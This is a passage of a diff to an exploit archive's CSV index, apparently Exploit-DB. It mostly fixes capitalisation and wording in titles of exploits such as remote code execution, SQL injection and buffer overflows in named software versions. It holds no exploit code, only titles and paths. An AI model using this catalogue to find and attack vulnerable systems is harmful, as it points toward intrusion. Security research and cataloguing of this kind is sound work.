-16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 (Mac OSX) - Overflow Exploit",2010-05-09,Metasploit,osx,remote,0 +16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OS X) - Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 (OS X) - Overflow Exploit",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Safari - Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 -16867,platforms/osx/remote/16867.rb,"Apple OSX Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 +16867,platforms/osx/remote/16867.rb,"Apple Mac OS X Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 16870,platforms/multiple/remote/16870.rb,"Mail.app - Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 -16871,platforms/osx/remote/16871.rb,"Mac OSX - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 +16871,platforms/osx/remote/16871.rb,"Apple Mac OS X - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow",2010-09-20,Metasploit,osx,remote,0 -16873,platforms/osx/remote/16873.rb,"MacOSX - QuickTime RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 -16874,platforms/osx/remote/16874.rb,"MacOSX - EvoCam HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 -16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba (Mac OSX PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 +16873,platforms/osx/remote/16873.rb,"Apple Mac OS X QuickTime - RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 +16874,platforms/osx/remote/16874.rb,"Apple Mac OS X EvoCam - HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16875,platforms/osx/remote/16875.rb,"Samba (OS X) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,osx,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba (OS X/PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution",2010-10-06,Metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow",2010-12-02,Metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 - report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 @@ -14697,7 +14698,7 @@ id,file,description,date,author,platform,type,port 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - rev Parameter Command Execution",2010-07-03,Metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution",2010-04-30,Metasploit,cgi,webapps,0 16894,platforms/php/webapps/16894.rb,"TWiki Search Function - Arbitrary Command Execution",2010-07-03,Metasploit,php,webapps,0 -16895,platforms/php/webapps/16895.rb,"Wordpress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 +16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin - misc.php Template Name Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 @@ -14706,15 +14707,15 @@ id,file,description,date,author,platform,type,port 16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 -16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 - TinyBrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0 +16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 - tinybrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution",2010-07-01,Metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,Metasploit,linux,remote,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - Remote PHP Code Execution",2010-09-20,Metasploit,php,webapps,0 -16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 +16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,Metasploit,php,webapps,0 -16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl - Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 +16914,platforms/cgi/webapps/16914.rb,"Matt Wright Guestbook.pl - Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection",2010-10-25,Metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,Metasploit,linux,remote,0 16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 @@ -14722,7 +14723,7 @@ id,file,description,date,author,platform,type,port 16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution",2010-07-03,Metasploit,linux,remote,0 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution",2010-04-30,Metasploit,linux,remote,0 16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution",2010-12-03,Metasploit,linux,remote,0 -16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,Metasploit,linux,remote,0 +16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution",2010-12-05,Metasploit,linux,remote,0 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web - Remote Command Execution",2010-10-09,Metasploit,hardware,webapps,0 16924,platforms/linux/remote/16924.rb,"ClamAV Milter - Blackhole-Mode Remote Code Execution",2010-10-09,Metasploit,linux,remote,0 16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,Metasploit,linux,remote,0 @@ -14732,34 +14733,34 @@ id,file,description,date,author,platform,type,port 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,Metasploit,aix,dos,0 16930,platforms/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,Metasploit,aix,remote,0 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - Cross-Site Request Forgery (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps,0 +16946,platforms/php/webapps/16946.txt,"Ruubikcms 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls - Local File Inclusion / Deletion",2011-03-06,"Mark Stanislav",php,webapps,0 16934,platforms/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x - SQL Injection",2011-03-06,DSecurity,php,webapps,0 -16935,platforms/php/webapps/16935.txt,"bacula-web 1.3.x < 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 +16935,platforms/php/webapps/16935.txt,"Bacula-Web 1.3.x < 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 16936,platforms/windows/remote/16936.html,"KingView 6.5.3 SCADA - ActiveX Exploit",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote,0 16937,platforms/php/webapps/16937.pl,"EggAvatar 2.3.2 for vBulletin 3.8.x - Local File Read",2011-03-07,DSecurity,php,webapps,0 16938,platforms/php/webapps/16938.txt,"BMForum Myna 6.0 - SQL Injection",2011-03-07,"Stephan Sattler",php,webapps,0 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0 16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0 -16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - .m3u Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 -16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow - .jpg Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0 -16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - .avi Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0 -16945,platforms/hardware/dos/16945.pl,"Nokia N97 - .m3u Playlist Crash (PoC)",2011-03-08,KedAns-Dz,hardware,dos,0 -16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 +16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 Slideshow - '.jpg' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0 +16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - '.avi' Local Crash (PoC)",2011-03-08,KedAns-Dz,windows,dos,0 +16945,platforms/hardware/dos/16945.pl,"Nokia N97 - '.m3u' Playlist Crash (PoC)",2011-03-08,KedAns-Dz,hardware,dos,0 +16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 WordPress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0 16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0 -16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 +16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic Denial of Service (2)",2011-03-10,zx2c4,linux,dos,0 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps,0 -16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 +16954,platforms/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow",2011-03-07,Metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution",2011-03-08,Metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 -16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Pre-Authenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 +16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution",2011-03-11,Metasploit,unix,remote,8812 @@ -14775,9 +14776,9 @@ id,file,description,date,author,platform,type,port 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 -16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - Javascript File Write",2011-03-14,Metasploit,windows,local,0 -16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 -16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Authenticated Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 +16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write",2011-03-14,Metasploit,windows,local,0 +16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,windows,dos,0 +16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 @@ -14785,7 +14786,7 @@ id,file,description,date,author,platform,type,port 16987,platforms/php/webapps/16987.txt,"pointter PHP content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 - Persistent Cross-Site Scripting",2011-03-16,"AutoSec Tools",php,webapps,0 -16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,Metasploit,multiple,remote,0 +16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution",2011-03-16,Metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injections",2011-03-17,"Aung Khant",php,webapps,0 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 @@ -14795,16 +14796,16 @@ id,file,description,date,author,platform,type,port 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization",2011-03-17,Metasploit,windows,remote,0 16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 17000,platforms/php/webapps/17000.txt,"Tugux CMS - (nid) Blind SQL Injection",2011-03-18,eidelweiss,php,webapps,0 -17001,platforms/windows/local/17001.pl,"CORE Multimedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 +17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17002,platforms/php/webapps/17002.txt,"CMS Loko Media - Local File Download",2011-03-18,Xr0b0t,php,webapps,0 -17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQL Injection / Bruteforce Exploit",2011-03-18,TecR0c,php,webapps,0 +17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQL Injection / Brute Force Exploit",2011-03-18,TecR0c,php,webapps,0 17004,platforms/linux/dos/17004.txt,"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate NULL Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary Upload File",2011-03-19,Xr0b0t,php,webapps,0 -17006,platforms/php/webapps/17006.txt,"balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 +17006,platforms/php/webapps/17006.txt,"Balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File",2011-03-19,Xr0b0t,php,webapps,0 17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 - Arbitrary File Upload",2011-03-19,eidelweiss,php,webapps,0 17011,platforms/asp/webapps/17011.txt,"Douran 3.9.7.8 - File Download/Source Code Disclosure",2011-03-20,"AJAX Security Team",asp,webapps,0 -17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - .m3u Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 +17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - m3u SEH Overflow",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 17014,platforms/php/webapps/17014.txt,"CMS Lokomedia 1.5 - Arbitrary File Upload",2011-03-21,eidelweiss,php,webapps,0 17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 @@ -14815,7 +14816,7 @@ id,file,description,date,author,platform,type,port 17021,platforms/windows/dos/17021.py,"SpoonFTP 1.2 - RETR Denial of Service",2011-03-21,"C4SS!0 G0M3S",windows,dos,0 17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17023,platforms/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 -17024,platforms/windows/remote/17024.txt,"7-technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 +17024,platforms/windows/remote/17024.txt,"7-Technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI - HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification",2011-03-23,Metasploit,windows,remote,0 @@ -14836,7 +14837,7 @@ id,file,description,date,author,platform,type,port 17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - Denial of Service",2011-03-24,"Craig Freyman",windows,dos,69 -17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 +17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager - getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,Metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer",2011-03-26,Metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0 @@ -14844,10 +14845,10 @@ id,file,description,date,author,platform,type,port 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webedition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 -17056,platforms/php/webapps/17056.txt,"Wordpress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 +17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution",2011-03-27,Metasploit,linux,remote,0 -17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 +17061,platforms/php/webapps/17061.txt,"Andy's PHP KnowledgeBase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 - Persistent Cross-Site Scripting",2011-03-29,"AutoSec Tools",php,webapps,0 17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local SEH Buffer Overflow",2011-03-29,Dr_IDE,windows,local,0 @@ -14855,9 +14856,9 @@ id,file,description,date,author,platform,type,port 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",windows,dos,0 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 -17072,platforms/windows/dos/17072.py,"Windows Explorer 6.0.2900.5512 - (Shmedia.dll 6.0.2900.5512) AVI Preview Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 +17072,platforms/windows/dos/17072.py,"Microsoft Windows Explorer 6.0.2900.5512 - (Shmedia.dll 6.0.2900.5512) AVI Preview Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 -17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - .avi Denial of Service (PoC)",2011-03-30,BraniX,windows,dos,0 +17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - '.avi' Denial of Service (PoC)",2011-03-30,BraniX,windows,dos,0 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 17077,platforms/php/webapps/17077.txt,"pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 @@ -14866,7 +14867,7 @@ id,file,description,date,author,platform,type,port 17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 -17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 - (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 +17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0 17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local,0 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit",2011-04-01,^Xecuti0N3r,windows,dos,0 @@ -14876,9 +14877,9 @@ id,file,description,date,author,platform,type,port 17093,platforms/php/webapps/17093.html,"Allomani Movies Library 2.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17094,platforms/php/webapps/17094.html,"Allomani Web Links 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 -17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 +17096,platforms/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 -17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Pre-Authenticated kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 +17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Pre-Authentication kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - news.php 'id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 @@ -14901,7 +14902,7 @@ id,file,description,date,author,platform,type,port 17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 - 